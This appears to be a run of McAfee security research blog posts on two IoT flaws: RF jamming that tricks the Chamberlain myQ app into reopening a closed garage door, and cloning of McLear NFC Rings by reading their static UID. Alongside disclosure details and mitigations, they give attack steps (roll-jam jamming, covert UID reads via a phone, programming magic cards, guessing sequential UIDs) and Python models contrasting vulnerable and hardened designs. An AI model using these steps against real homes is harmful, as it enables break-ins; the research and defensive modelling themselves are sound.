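@dataclass
class SensorLink:
    """RF link to the tilt sensor; while jammed, reports never arrive."""
    jammed: bool = False

    def report(self, door: Door) -> Optional[bool]:
        return None if self.jammed else door.is_open


class NaiveHub:
    """Sends TOGGLE first and checks the sensor afterwards; a lost report is
    surfaced as a retryable error, so the retry toggles a closed door open."""

    def __init__(self, door: Door, link: SensorLink) -> None:
        self.door, self.link = door, link
        self.alerts: List[str] = []

    def close(self) -> str:
        self.door.toggle()
        state = self.link.report(self.door)
        if state is None:
            return "error: no confirmation from sensor, please try again"
        return "closed" if not state else "error: door still open, please try again"


class HardenedHub(NaiveHub):
    """Reads a fresh report before actuating and refuses to send TOGGLE on an
    unknown state: a jammed link can delay a close but never reopen the door.
    Lost reports are recorded so the app can alert instead of inviting a retry."""

    def close(self) -> str:
        before = self.link.report(self.door)
        if before is None:
            self.alerts.append("sensor unreachable before actuation")
            return "error: sensor unreachable, refusing to actuate"
        if not before:
            return "already closed"
        self.door.toggle()
        after = self.link.report(self.door)
        if after is None:
            self.alerts.append("sensor unreachable after actuation")
            return "unconfirmed: sensor unreachable, not retrying"
        return "closed" if not after else "error: door still open"


def jam_and_retry(hub_cls) -> Tuple[bool, List[str]]:
    """Replay the post's timeline: the sensor link is jammed the moment the
    door starts to close, the user sees an error and taps Close again.
    Returns (door is open at the end, the two messages the user saw)."""
    door, link = Door(is_open=True), SensorLink()

    def jam_when_closing(d: Door) -> None:
        if not d.is_open:
            link.jammed = True

    door.observers.append(jam_when_closing)
    hub = hub_cls(door, link)
    messages = [hub.close(), hub.close()]
    return door.is_open, messages


def quiet_close(hub_cls) -> bool:
    """Control case with no interference: both hubs close the door normally.
    Returns whether the door is still open afterwards."""
    door = Door(is_open=True)
    hub_cls(door, SensorLink()).close()
    return door.is_open


if __name__ == "__main__":
    print("naive hub, door open after retry:   ", jam_and_retry(NaiveHub)[0])     # True
    print("hardened hub, door open after retry:", jam_and_retry(HardenedHub)[0])  # False
```

The hardened variant cannot close the door through a jammed link either; what it removes is the silent reopen, turning the lost report into an alert rather than a prompt to retry.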

Review McLear NFC Ring IoT device

The McAfee ATR team also discovered an insecure design with the McLear NFC Ring, a household access control device that can be used to interact with NFC-enabled door locks. Once the NFC Ring has been paired with an NFC-enabled door lock, the user can access their house by simply placing the NFC Ring within the NFC range of the door lock instead of using a traditional house key. However, due to an insecure design, hackers could easily clone the ring and gain access to a user’s home.

How can the McLear NFC Ring be hacked?

  • First, the attacker can do some basic research on the victim, such as finding a social media post about how excited they are to use their new McLear NFC Ring.
  • Now, say the attacker locates the victim in a public setting and asks them to take a picture of them on the attacker’s phone. The attacker’s phone, equipped with an app to read NFC tags, can record the relevant information without giving any signs of foul play.
  • The McLear NFC Ring is now compromised, and the information can be programmed on a standard writable card, which can be used to unlock smart home locks that partner with the product.

How to keep your IoT devices safe from hacking

In the era of IoT devices, the balance between cybersecurity and convenience is an important factor to get right. According to Steve Povolny, head of McAfee Advanced Threat Research, “the numerous benefits technology enhancements bring us are exciting and often highly valuable; but many people are unaware of the lengths hackers will go and the many ways new features can impact the security of a system.” To help safeguard your security while still enjoying the benefits of your connected devices, check out the following tips:

  • Practice proper online security habits. Fortunately, users have many tools at their disposal, even when cybersecurity concerns do manifest. Implement a strong password policy, put IoT devices on their own, separate network, utilize dual-factor authentication when possible, minimize redundant systems, and patch quickly when issues are found.
  • Do your research. Before purchasing a new IoT device, take the time to look into its security features. Users should ensure they are aware of the security risks associated with IoT products available on the market.

Stay up to date

To stay on top of McAfee’s CES news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What You Need to Know About the Latest IoT Device Flaws appeared first on McAfee Blogs.

We Be Jammin’ – Bypassing Chamberlain myQ Garage Doors https://www.mcafee.com/blogs/other-blogs/mcafee-labs/we-be-jammin-bypassing-chamberlain-myq-garage-doors/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/we-be-jammin-bypassing-chamberlain-myq-garage-doors/#respond Tue, 07 Jan 2020 05:01:55 +0000 /blogs/?p=97928


The idea of controlling your garage door remotely and verifying that everything is secure at home, or having packages delivered directly into your garage, is enticing for many people. The convenience that many of these IoT devices provide often persuades consumers away from thinking about the possible security concerns.

McAfee Advanced Threat Research recently investigated Chamberlain’s MyQ Hub, a “Universal” garage door automation platform. The way Chamberlain has made this device universal is via a Hub, which acts as a new garage door opener, similar to the one that you would have in your car. This allows the MyQ Hub to retrofit and work with a wide variety of garage doors.

We found that Chamberlain did a fairly good job of securing this device, which is uncommon for IoT devices. However, we discovered a flaw in the way the MyQ Hub communicates with the remote sensor over radio frequencies.

From an attack perspective there are three main vectors that we began to look at: local network, remote access (API, or third-party integration), and RF communications between the sensor and the Hub. The first thing we attempted was to gain access to the device via the local network. A quick port scan of the device revealed that it was listening on port 80. When attempting to navigate to the device at port 80 it would redirect to start.html and return a 404 error. No other ports were open on the device.

The inside of the Chamberlain MyQ Hub

Disassembling the Hub revealed a small SOC (system on a chip) module that was handling the Wi-Fi and web communications and a secondary PIC microcontroller which was responsible for controlling the RF side of things for both the garage door and the remote door sensor. The MyQ Hub listed on FCC’s website also included a Bluetooth module that was not present on the two MyQ Hubs that we purchased.

The UART connection was disconnected or not enabled, but the JTAG connection worked to communicate directly with the main Wi-Fi module. With the JTAG connection we were able to dump the entire contents of the flash chip and debug the system unrestricted. The main Wi-Fi module was a Marvell microcontroller running an RTOS (Real Time Operating System), which behaves much differently from a normal Linux system. While it will still run predefined applications, an RTOS usually doesn’t have a filesystem like traditional systems do. We extracted the entire contents of the Marvell microprocessor and were able to analyze the assembly and determine how the web server behaves.

From looking through the web server code we were able to identify how the device is setup through the local API as well as finding some interesting, albeit not very useful commands that we could send.

Local API commands

There were more URLs that we found to be accessible and some additional API paths, but nothing stood out as a good place to start an attack from. At this point we decided to investigate the other attack vectors.

We didn’t spend too much time looking into the third-party attack vector and remote API since it becomes sort of a gray area for researching. While we were testing with the /sys/mode API call we were able to put the device into a soft factory reset, where we were able to attempt to add the device to a different account. From capturing the SSL traffic on the mobile application, we were able to see that it was failing since the serial number was already registered to another account. We used a technique called SSL unpinning to decrypt traffic from the Android application; we’ll post a future blog explaining this process in greater detail. One thing that we wanted to try was to modify the Android app to send a different serial number. Since we don’t believe that the device ever cleared the original garage door information, we could have potentially opened the device from the new account. However, this is all speculation and was not tested because we didn’t want to access the remote API.

The last vector we looked at was RF. We began trying to break down the frequency modulation between the remote door sensor and the Hub. We originally thought it was some sort of FSK (frequency shift keying) where data is transmitted digitally. If the signal is in one frequency the corresponding bit is 0 and if the signal is shown on another frequency the bit is 1. This idea was thrown out since the MyQ remote sensor was using 3 different frequencies not just two.

Looking at the door sensor’s FCC filing we noticed a particularly helpful revision that they made.

OOK stands for “On-Off Keying” and is another method of encoding digital bits into RF. OOK will either be sending a signal (1) or not sending a signal (0). Because a 0 is simply the absence of a signal, the transmitter and receiver must be synchronized on symbol timing to tell a run of zeros apart from silence.

On Off Keying Graphical Representation

Here is the binary representation for the signal captured from the MyQ remote door sensor. This is a tightly zoomed-in window of the entire signal.

One full message captured, each color is a different frequency

aaaaaaaa559999aa59655659a6965aa9a99996aa6aa0aaaaaaaa55a9699a6566696699555a6a5556966555500aaaaaaaa559999aa59655659a6965aa9a99996aa6aa

We can observe the state transmission captured from all three frequencies and converted to hexadecimal. It’s easy to identify data patterns within the transmission, as represented in color above, but we were never able to crack it to arbitrarily transmit false states from our SDR (Software Defined Radio). We also noticed that the RF engineers at Chamberlain had security in mind not only by separating the signal into three separate frequencies, but also by implementing rolling codes. You may be familiar with the rolling code technique from things like your standard garage door opener or your car key fob. Rolling code devices prevent an attacker from directly capturing a signal and replaying it: each transmission carries a unique code that the receiver records, and if the receiver ever sees that code again it ignores it.
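The following is an added analysis example, not tooling from the research team: it splits the hex capture printed above into frames at the ‘0’ nibbles (carrier off), and checks an observation that goes beyond the post, namely that every remaining nibble is one of 5/6/9/a, so every chip pair is 01 or 10, which is consistent with Manchester line coding over OOK. The 10→1 / 01→0 decoding convention is an assumption; the opposite convention just inverts every bit.

```python
from __future__ import annotations

# Hex capture exactly as printed in the post (three frames separated by gaps).
CAPTURE = ("aaaaaaaa559999aa59655659a6965aa9a99996aa6aa0"
           "aaaaaaaa55a9699a6566696699555a6a5556966555500"
           "aaaaaaaa559999aa59655659a6965aa9a99996aa6aa")

PREAMBLE = "aaaaaaaa"             # 32 alternating on/off chips opening each frame
MANCHESTER_NIBBLES = set("569a")  # the only nibbles made of 01/10 chip pairs


def split_frames(capture: str) -> list[str]:
    """Split the capture into frames at '0' nibbles (carrier off = gap)."""
    return [f for f in capture.lower().split("0") if f]


def is_manchester_consistent(frame: str) -> bool:
    """True if every chip pair in the frame is 01 or 10."""
    return all(n in MANCHESTER_NIBBLES for n in frame)


def hex_to_chips(frame: str) -> str:
    """Expand hex nibbles to the on/off chip string they represent."""
    return "".join(f"{int(n, 16):04b}" for n in frame)


def manchester_decode(frame: str, one: str = "10") -> str:
    """Decode chip pairs to bits. ASSUMPTION: '10' -> 1 and '01' -> 0."""
    chips = hex_to_chips(frame)
    if len(chips) % 2:
        raise ValueError("odd chip count")
    zero = "01" if one == "10" else "10"
    bits = []
    for i in range(0, len(chips), 2):
        pair = chips[i:i + 2]
        if pair == one:
            bits.append("1")
        elif pair == zero:
            bits.append("0")
        else:
            raise ValueError(f"invalid Manchester pair {pair!r} at chip {i}")
    return "".join(bits)


def analyse(capture: str = CAPTURE) -> list[dict]:
    """Per-frame summary: preamble present, Manchester-consistent, payload bits."""
    report = []
    for idx, frame in enumerate(split_frames(capture)):
        info = {
            "frame": idx,
            "nibbles": len(frame),
            "has_preamble": frame.startswith(PREAMBLE),
            "manchester": is_manchester_consistent(frame),
        }
        if info["manchester"]:
            bits = manchester_decode(frame)
            # Each nibble is two decoded bits, so the preamble is 16 bits long.
            info["payload_bits"] = bits[len(PREAMBLE) * 2:]
        report.append(info)
    return report


def repeated_frames(capture: str = CAPTURE) -> list[tuple[int, int]]:
    """Pairs of frame indices whose raw chips are identical."""
    frames = split_frames(capture)
    return [(i, j) for i in range(len(frames))
            for j in range(i + 1, len(frames)) if frames[i] == frames[j]]


if __name__ == "__main__":
    for row in analyse():
        print(row)
    print("identical frames:", repeated_frames())
```

On this capture the first and third frames are byte-for-byte identical and the second differs, which is why identifying the line code alone does not defeat the rolling code discussed below.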

The way attackers have overcome rolling code devices is by a method called “Roll Jam.” An attacker will jam the rolling code signal from the transmitter, blocking it from ever making it to the receiver, while simultaneously capturing the valid rolling code and storing it. This way the attacker now has an unused and valid rolling code that the receiver has never seen before. The caveat to this method is that normally the victim will notice that either the garage door or car didn’t unlock. A stealthier method to Roll Jam is always capturing the latest code and replaying the latest signal minus 1. This way the car or door will open but the attacker still owns the latest code for their use.

The MyQ also had a rolling code implementation that we were able to develop a variant of this technique against. We took the concept of jamming the original code from the receiver by transmitting a large amount of “noise” directly adjacent to the valid signal frequency. This causes the receiver in the MyQ Hub to overload and not hear the valid signal. However, with the precision of the SDR, we were able to ignore the noise that we are transmitting and store the signal. This was further complicated by the fact that there were three frequencies that we had to simultaneously listen for and jam. If you are interested in this FHSS (Frequency Hopping Spread Spectrum) Roll Jam technique, please read our white paper.

Within the research related to Chamberlain Garage Door Hub described in this blog, the only interference was to unlicensed spectrum radio frequency for the minimum period while the garage door hub was transmitting state signal, and there was no interference with any communications signal licensed or authorized under the Communications Act or FCC rules.

This technique worked, but since the remote sensor and the MyQ Hub always have the advantage in the RF landscape, it was unreliable. The jamming aspect of the attack worked nicely; however, since we are outside of the garage and the remote sensor and the Hub are both located within the same garage, it is harder to jam and listen at the same time with the garage door and walls acting as barriers. With higher powered radios, frequency-tuned antennas, and disregard for FCC regulations, the jamming of the remote sensor could take place at a much greater distance than we were able to test in our lab environment.

A waterfall view of the remote sensor signal (red) and jamming (black)

With our jamming working reliably, we confirmed that when a user closes the garage door via the MyQ application, the remote sensor never responds with the closed signal because we are jamming it. The app will alert the user that “Something went wrong. Please try again.” This is where a normal user, if not in direct sight of the garage door, would think that their garage door is indeed open, when in reality it is securely closed. If the user believes the MyQ app then they would do as the application indicates and “try again” – this is where the statelessness of garage doors comes into play. The MyQ Hub will send the open/closed signal to the garage door and it will open, because it is already closed, and it is simply changing state. This allows an attacker direct entry into the garage, and, in many cases, into the home.

Now that the garage door is really open, the attacker probably doesn’t want to leave the state as-is, notifying the victim that something went wrong again. Putting the garage door into a closed state and allowing the app to clear the error will put the victim at ease. This could be executed either by a replay from a previously captured closed signal, or, in the most simplistic manner, by removing the remote sensor from the Velcro on the garage door and placing it in the vertical position, signaling to the Hub that the door closed successfully.

Attack Reproduction State Flowchart
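A simulation of the state-confusion flow described above, added here as an example rather than Chamberlain’s firmware or app code. The opener understands only a toggle, the app learns the door state solely from sensor reports, and a lost report (interference, a jammer, a flat battery; the hub cannot tell which) leaves the app believing the door is still open. The `require_fresh_state` policy is an illustrative assumption, stricter than the vendor’s actual fix, which adds a warning: refuse to send a toggle while the last confirmed state is stale.

```python
from __future__ import annotations
from dataclasses import dataclass, field

OPEN, CLOSED = "open", "closed"


@dataclass
class Door:
    """The opener has a single input: toggle whatever state the door is in."""
    state: str = OPEN

    def toggle(self) -> None:
        self.state = CLOSED if self.state == OPEN else OPEN


@dataclass
class Sensor:
    """Tilt sensor on the door; its RF report may never reach the hub."""
    door: Door
    report_reaches_hub: bool = True

    def report(self) -> str | None:
        return self.door.state if self.report_reaches_hub else None


@dataclass
class App:
    """Hub plus app. believed_state is only ever updated from sensor reports.
    require_fresh_state=False reproduces the behaviour described in the post;
    True is an illustrative stricter policy (an assumption, not the vendor's fix)."""
    door: Door
    sensor: Sensor
    require_fresh_state: bool = False
    believed_state: str = field(init=False)
    stale: bool = field(init=False, default=False)
    log: list[str] = field(default_factory=list)

    def __post_init__(self) -> None:
        self.believed_state = self.door.state   # state known at pairing time

    def _sync(self) -> bool:
        """Refresh believed_state from the sensor; False if no report arrived."""
        report = self.sensor.report()
        if report is None:
            self.stale = True
            return False
        self.believed_state, self.stale = report, False
        return True

    def press_close(self) -> str:
        """User taps 'close' in the app."""
        if self.require_fresh_state and self.stale and not self._sync():
            self.log.append("refused: door state unknown, no command sent")
            return "STATE_UNKNOWN"
        if self.believed_state == CLOSED and not self.stale:
            return "ALREADY_CLOSED"
        self.door.toggle()            # the only command the opener understands
        if self._sync():
            self.log.append(f"confirmed {self.believed_state}")
            return "OK"
        self.log.append("Something went wrong. Please try again.")
        return "ERROR"


def scenario(require_fresh_state: bool, reports_arrive: bool) -> tuple[str, list[str]]:
    """Door starts open; the user presses close, sees the result, presses again.
    Returns the door's real state and the two app responses."""
    door = Door(OPEN)
    app = App(door, Sensor(door, reports_arrive), require_fresh_state)
    responses = [app.press_close(), app.press_close()]
    return door.state, responses


if __name__ == "__main__":
    print("reports arrive, naive :", scenario(False, True))   # ('closed', ['OK', 'ALREADY_CLOSED'])
    print("reports lost,   naive :", scenario(False, False))  # ('open', ['ERROR', 'ERROR'])
    print("reports lost,   strict:", scenario(True, False))   # ('closed', ['ERROR', 'STATE_UNKNOWN'])
```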

We also realized that in a real-world scenario, an attacker wouldn’t likely sit outside of a garage all day, so we decided to automate the attack. We used GNU radio to implement a JIT (just in time) method of jamming where the SDR will sit dormant listening on the MyQ’s three separate frequencies. The moment it notices that the remote door sensor is beginning a transmission, it will dynamically enable and start jamming of the signal.

GNU Radio JIT Jamming and State Capture over 3 Simultaneous Frequencies

This expands the use cases of this type of attack by being able to create a small device that could be placed out of sight near the garage door. This technique is also described in more detail in our FHSS white paper. The JIT jamming makes it very difficult to locate the device using RF triangulation and allows it to be better equipped for battery operation.

While this may not be too common for individuals using the MyQ Hub, recall the earlier reference to third-party partnerships with MyQ for garage delivery. Another possible attack would be when a delivery driver uses the application. The primary reason users sign up for this service is the concept of a package delivery to a secure location (the garage) even when they are not home. The victim can be absent from the property yet have access via the MyQ app over the internet to open or close the garage door if a delivery driver uses the MyQ hub for an in-garage delivery. A determined hacker could pull this attack off, and the victim may have a higher probability of believing that the door is in fact open. We disclosed our findings in full to Chamberlain on 9/25/2019, including detailed reproduction steps for the jamming attack. We also talked to Chamberlain about this issue with the third-party delivery drivers and how it could fit into this attack model. After extensive testing and validation of the issue, the vendor released an update to the myQ App as of version 4.145.1.36946. This update provides a valuable warning message to users indicating the garage door state may not be accurate, but it does not prevent the user from remotely controlling the door itself.

The beauty of IoT devices is that they solve problems we have learned to live with. After we experience the convenience and the way these devices can automate, secure, or assist in our lives, it is hard to see them ever going away. This ease and automation often overshadows the potential security threat they may pose. Even simple enhancements to manual products over time have this effect; take for example the now-legacy garage door opener in your car. The ability to capture and replay the basic signals transformed the threat from physical to digital space. While the Chamberlain MyQ Hub ultimately produces a generally more secure method of accessing garages than its predecessors, consumers should be aware that any extension of a technology platform, such as using WiFi, a mobile app and FHSS RF transmissions, also extends possible threat vectors.

We would like to finish by commenting that the likelihood of a real-world attack on this target is low, based on the complexity of the attack and installation footprint. We have discussed this with Chamberlain, who has validated the findings and agrees with this assessment. Chamberlain has made clear efforts to build a secure product and appears to have eliminated much of the low-hanging fruit common to IoT devices. This vendor has been a pleasure to work with and clearly prioritizes security as a foresight in the development of its product.


The post We Be Jammin’ – Bypassing Chamberlain myQ Garage Doors appeared first on McAfee Blogs.

The Cloning of The Ring – Who Can Unlock Your Door? https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-cloning-of-the-ring-who-can-unlock-your-door/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-cloning-of-the-ring-who-can-unlock-your-door/#respond Tue, 07 Jan 2020 05:01:14 +0000 /blogs/?p=97916

Steve Povolny contributed to this report.

McAfee’s Advanced Threat Research team performs security analysis of products and technologies across nearly every industry vertical. Special interest in the consumer space and Internet of Things (IoT) led to the discovery of an insecure design in the McLear NFC Ring, a household access control device. The NFC Ring can be used to interact with NFC-enabled door locks which conform to the ISO/IEC 14443A NFC card type. Once the NFC Ring has been paired with the NFC-enabled door lock, the user can access their house by simply placing the NFC Ring within NFC range of the door lock.

McLear originally invented the NFC Ring to replace traditional keys with functional jewelry. The NFC Ring uses near field communication (NFC) for access control, to unlock and control mobile devices, share and transfer information, link people and much more. McLear NFC Ring aims to redefine and modernize access control to bring physical household security through convenience. Their latest ring also supports payment capability with McLear Smart Payment Rings, which were not in scope for this research.

Identity is something which uniquely identifies a person or object; an NFC tag is a perfect example of this. Authentication can be generally classified into three types: something you know, something you have and something you are. An NFC Ring is different from general NFC access tag devices (something you have) as the Ring sits on your finger, so it is a hybrid authentication type of something you have and something you are. This unique combination, as well as the accessibility of a wearable Ring with NFC capabilities, sparked our interest in researching this product as an NFC-enabled access control device. Therefore, the focus of our research was on NFC Ring protection against cloning as opposed to the door lock, since NFC access control tags and door locks have been well researched.

The research and findings for this flaw were reported to McLear on September 25, 2019. To date, McAfee Advanced Threat Research has not received a response from the vendor.

Duplicating Keys Beyond the Hardware Store

In the era of the Internet of Things (IoT), the balance between security and convenience is an important factor to get right during the concept phase of a new product and the bill of materials (BOM) selection. The hardware selection is critical as it often determines the security objectives and requirements that can be fulfilled during design and implementation of the product lifecycle. The NFC Ring uses an NFC-capable Integrated Circuit (IC) which can be easily cloned and provides no security other than NFC proximity. The NFC protocol does not provide authentication and relies on its operational proximity as a form of protection. The problem with NFC tags is that they automatically transmit their UID when in range of an NFC reader without any authentication.

Most consumers today use physical keys to secure access to their household door. The physical key security model requires an attacker to get physical access to the key or break the door or door lock. The NFC Ring, if designed securely, would provide equal or greater security than the physical key security model. However, since the NFC Ring can be easily cloned without having to attain physical access to the Ring, it makes the product’s security model less secure than a consumer having a physical key.

In this blog we discuss cloning of the NFC Ring and secure design recommendations to improve its security to a level equal to or greater than existing physical keys.

NFC Ring Security Model and Identity Theft

All McLear non-payment NFC Rings using NTAG216 ICs are impacted by this design flaw. Testing was performed specifically on the OPN, which has an NTAG216 IC. The NFC Ring uses the NTAG216 NFC-enabled Integrated Circuit (IC) to provide access control by means of NFC communication.

The NFC protocol provides no security as it’s just a transmission mechanism. The onus is on product owners to responsibly design and implement a security layer to meet the security objectives, capable of thwarting the threats identified during the threat modeling phase at concept commit.

The main threats against an NFC access control tag are physical theft and tag cloning over NFC. At a minimum, a tag should be protected against cloning over NFC; that alone would give the NFC Ring the same level of security as a physical key. Ideal security would also protect against cloning even when the NFC Ring has been physically stolen, which would provide greater security than that of a physical key.

The NTAG216 IC provides the following security features per the NFC Ring spec:

  1. Manufacturer programmed 7-byte UID for each device
  2. Pre-programmed capability container with one-time programmable bits
  3. Field programmable read-only locking function
  4. ECC based originality signature
  5. 32-bit password protection to prevent unauthorized memory operations

The NFC Ring security model is built on the “Manufacturer programmed 7-byte UID for each device” as the Identity and Authentication with the access control principle or door lock. This 7-byte UID (unique identifier) can be read by any NFC enabled device reader such as a proxmark3 or mobile phone when within NFC communication range.

The NFC Ring security model can be broken by any NFC device reader when they come within NFC communication range since the static 7-byte UID is automatically transmitted without any authentication. Once the 7-byte UID has been successfully read, a magic NTAG card can be programmed with the UID, which forms a clone of the NFC Ring and allows an attacker to bypass the secure access control without attaining physical access to the NFC Ring.

The NFC Ring is insecure by design as it relies on the static 7-byte UID programmed at manufacture within the NTAG216 for device identity and authentication purposes. The NFC Ring security model relies on NFC proximity and a static identifier which can be cloned.

In addition, we discovered that the UIDs across NFC Rings may be predictable (this was a very small sample size of three NFC Rings):

  • NFC Ring#1 UID 04d0e722993c80
  • NFC Ring#2 UID 04d24722993c80
  • NFC Ring#3 UID 04991c4a113c80

The UIDs of NFC Ring#1 and NFC Ring#2 differ by only 22 (0x24 - 0x0e). By social engineering when a victim purchased their NFC Ring, an attacker could purchase a significant sample of NFC Rings around the same time and possibly brute force the victim’s NFC Ring UID.

Social Engineering

Social Engineering consists of a range of techniques which can be used through human interaction for many malicious purposes such as identity theft. In the case of the NFC Ring the goal is to steal the user’s identity and gain access to their home. Reconnaissance can be performed online to gain background information such as what type of technology is being used by the victim for their home access.

One of the most common exchanges of technology today has become the passing of a phone between two untrusted parties to take a picture. The NFC Ring social engineering attack could be as simple as requesting the victim to take a picture with the attacker-supplied phone. The victim-as-helpful-photographer holds the attacker’s phone, which can read NFC tags and could be equipped with a custom Android app to read the NFC Ring UID, all transparent to the victim while they are snapping away. There is no sign to the victim that their NFC Ring is being read by the phone. It is recorded in the system log and cannot be viewed until a USB cable is attached with required software. Once the Ring is compromised, it can be reprogrammed on a standard writable card, which can be used to unlock smart home locks that partner with this product. The victim’s home is breached.

How It’s Done: NFC Ring Cloning

To successfully clone an NFC Tag, one must first identify the Tag type. This can be done by looking up the product specifications in some cases, or verifying by means of an NFC device reader such as a proxmark3.

From the NFC Ring specs we can determine most of the required tag characteristics:

  1. IC Model: NTAG216
  2. Operating Frequency: 13.56 MHz
  3. ISO/IEC: 14443A
  4. User writable space: 888 bytes
  5. Full specifications

In addition, by communicating with a proxmark3 attackers can physically verify the NFC Tag characteristics and obtain the UID which is required for cloning.

The most straightforward method of stealing the unique identifier of the Ring would be through a mobile phone. The following steps were taken in the demo below:

  1. Reading of NFC Ring with proxmark3 and cloning NTAG21x emulator card
  2. Setting attacker’s phone to silent to prevent NFC Tag detection sound
  3. Running our customized Android app to prevent Android activity popup when NFC Tag detected and read.

Mitigation Secure Design Recommendations

Lock the door. The existing insecure design can be mitigated by using the NFC door lock’s password protection in combination with the NFC Ring for two-factor authentication.

Authenticate. NFC Ring designers must mandate a secure PKI design with an NFC tag that contains a crypto module providing tag authentication. The NFC Ring secure design must mandate a security layer on top of NFC for access control device manufacturers, to ensure secure and trustworthy operation.

Randomize UIDs. In addition, the NFC designers must ensure they are not manufacturing NFC Rings with sequential UIDs which may be predictable with purchase date.
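An added example contrasting the two designs above; it is not McLear’s or any lock vendor’s code. `UidLock` trusts the static 7-byte UID, which any reader in range can copy onto an emulator card. `ChallengeLock` is a constructed challenge-response design in the spirit of the “Authenticate” recommendation: a per-tag secret is provisioned at pairing, and every unlock requires a fresh HMAC over the UID and a random nonce, so a clone that only has the UID fails. The three UIDs are those printed in the post; `uid_gap` is a constructed manufacturing QA check for the “Randomize UIDs” concern.

```python
from __future__ import annotations
import hashlib
import hmac
import secrets

# The three UIDs printed in the post.
RING_UIDS = {
    "ring1": bytes.fromhex("04d0e722993c80"),
    "ring2": bytes.fromhex("04d24722993c80"),
    "ring3": bytes.fromhex("04991c4a113c80"),
}


class Tag:
    """An NFC tag. The UID is broadcast to any reader in range; the key, if
    present, lives only inside the tag and is used to answer challenges.
    A plain NTAG216 has no such key, modelled here as key=None."""

    def __init__(self, uid: bytes, key: bytes | None = None):
        self.uid = uid
        self._key = key

    def read_uid(self) -> bytes:
        return self.uid

    def respond(self, nonce: bytes) -> bytes | None:
        if self._key is None:
            return None            # a UID-only tag cannot authenticate
        return hmac.new(self._key, self.uid + nonce, hashlib.sha256).digest()


def clone_by_uid(tag: Tag) -> Tag:
    """What a reader in range can produce: an emulator card with the same UID."""
    return Tag(tag.read_uid())


class UidLock:
    """Lock that trusts the static UID (the post's 'insecure by design' model)."""

    def __init__(self):
        self.enrolled: set[bytes] = set()

    def enroll(self, tag: Tag) -> None:
        self.enrolled.add(tag.read_uid())

    def try_unlock(self, tag: Tag) -> bool:
        return tag.read_uid() in self.enrolled


class ChallengeLock:
    """Lock that pairs a per-tag secret at enrolment and then requires a fresh
    HMAC over (uid || nonce) on every unlock. Constructed design, not a
    product's protocol."""

    def __init__(self):
        self.keys: dict[bytes, bytes] = {}

    def enroll(self, tag: Tag, key: bytes) -> None:
        # Pairing ceremony: the secret is shared once, out of band.
        self.keys[tag.read_uid()] = key

    def try_unlock(self, tag: Tag) -> bool:
        uid = tag.read_uid()
        key = self.keys.get(uid)
        if key is None:
            return False
        nonce = secrets.token_bytes(16)          # fresh per attempt: no replay
        answer = tag.respond(nonce)
        if answer is None:
            return False
        expected = hmac.new(key, uid + nonce, hashlib.sha256).digest()
        return hmac.compare_digest(answer, expected)


def uid_gap(a: bytes, b: bytes) -> int:
    """Numeric distance between two UIDs; a small gap relative to the 56-bit
    space suggests sequential allocation."""
    return abs(int.from_bytes(a, "big") - int.from_bytes(b, "big"))


def demo() -> dict[str, bool]:
    """Enrol ring1 in both lock designs, then try the genuine tag and a clone."""
    key = secrets.token_bytes(32)                  # provisioned at pairing time
    genuine = Tag(RING_UIDS["ring1"], key)
    clone = clone_by_uid(genuine)                  # the clone only has the UID

    uid_lock = UidLock()
    uid_lock.enroll(genuine)
    cr_lock = ChallengeLock()
    cr_lock.enroll(genuine, key)

    return {
        "uid_lock_genuine": uid_lock.try_unlock(genuine),
        "uid_lock_clone": uid_lock.try_unlock(clone),     # True: the design flaw
        "cr_lock_genuine": cr_lock.try_unlock(genuine),
        "cr_lock_clone": cr_lock.try_unlock(clone),       # False: needs the key
    }


if __name__ == "__main__":
    print(demo())
    print("ring1/ring2 gap:", hex(uid_gap(RING_UIDS["ring1"], RING_UIDS["ring2"])))
```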

Consumer Awareness

To make customers aware of the security risks associated with products available on the market, product manufacturers should clearly state the level of security which their product provides in comparison with the technology or component they claim to be advancing. Are customers holding the master key to unlock their door, and are there duplicates?

In the case of the NFC Ring, while convenient, it clearly does not provide the same level of security to consumers as a physical key. This decrease in the security model from a physical key to an NFC Ring is not due to technology limitations but to an insecure design.


The post The Cloning of The Ring – Who Can Unlock Your Door? appeared first on McAfee Blogs.

The Tradeoff Between Convenience and Security – A Balancing Act for Consumers and Manufacturers https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-tradeoff-between-convenience-and-security-a-balancing-act-for-consumers-and-manufacturers/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-tradeoff-between-convenience-and-security-a-balancing-act-for-consumers-and-manufacturers/#respond Tue, 07 Jan 2020 05:01:01 +0000 /blogs/?p=97914

This week McAfee Advanced Threat Research (ATR) published new findings, uncovering security flaws in two popular IoT devices: a connected garage door opener and a “smart” ring, which, amongst many uses, utilizes near field communication (NFC) to open door locks.

I’d like to use these cases as examples of a growing concern in the area of product security. The industry of consumer devices has seen some positive momentum for security in recent years. For example, just a few years back, nearly every consumer-grade router shipped with a default username and password, which, if left unchanged, represented a serious security concern for home networks. At a minimum, most routers at least now ship with a unique password printed on the physical device itself, dramatically increasing the overall network security. Despite positive changes such as this, there is a long way to go.

If we think about the history of garage doors, they began as a completely manual object, requiring the owner to lift or operate it physically. The first overhead garage door was invented in the early 1920s, and an electric version came to market just a few years later. While this improved the functionality of the device and allowed for “remote” entry, it wasn’t until many years later that an actual wireless remote was added, giving consumers the ability to allow wireless access into their home. This was the beginning of an interesting tradeoff for consumers – an obvious increase in convenience which introduced a potential new security concern.

The same concept applies to the front door. Most consumers still utilize physical keys to secure the front door to their homes. However, the introduction of NFC enabled home door locks, which can be opened using compatible smart rings, adds both convenience and potentially compromised security.

For example, upon investigating the McLear NFC Ring, McAfee ATR uncovered a design insecurity, which could allow an attacker to easily clone the NFC Ring and gain entry to a home utilizing an NFC enabled smart lock.

While the NFC Ring modernizes physical household security, the convenience that comes with technology implementation also introduces a security issue.

The issue here is at a higher level; where and when do we draw the line for convenience versus security? The numerous benefits technology enhancements bring are exciting and often highly valuable; but many are unaware of the lengths cyber criminals will go to (for example, we once uncovered a vulnerability in a coffee pot which we were able to leverage to gain access to a home Wi-Fi network) and the many ways new features can reduce the security of a system.

As we move towards automation and remote access to nearly every computerized system on the planet, it’s our shared responsibility to maintain awareness of this fact and demand a higher bar for the products that we buy.

So what can be done? The responsibility is shared between consumers and manufacturers, and there are a few options:

For consumers:

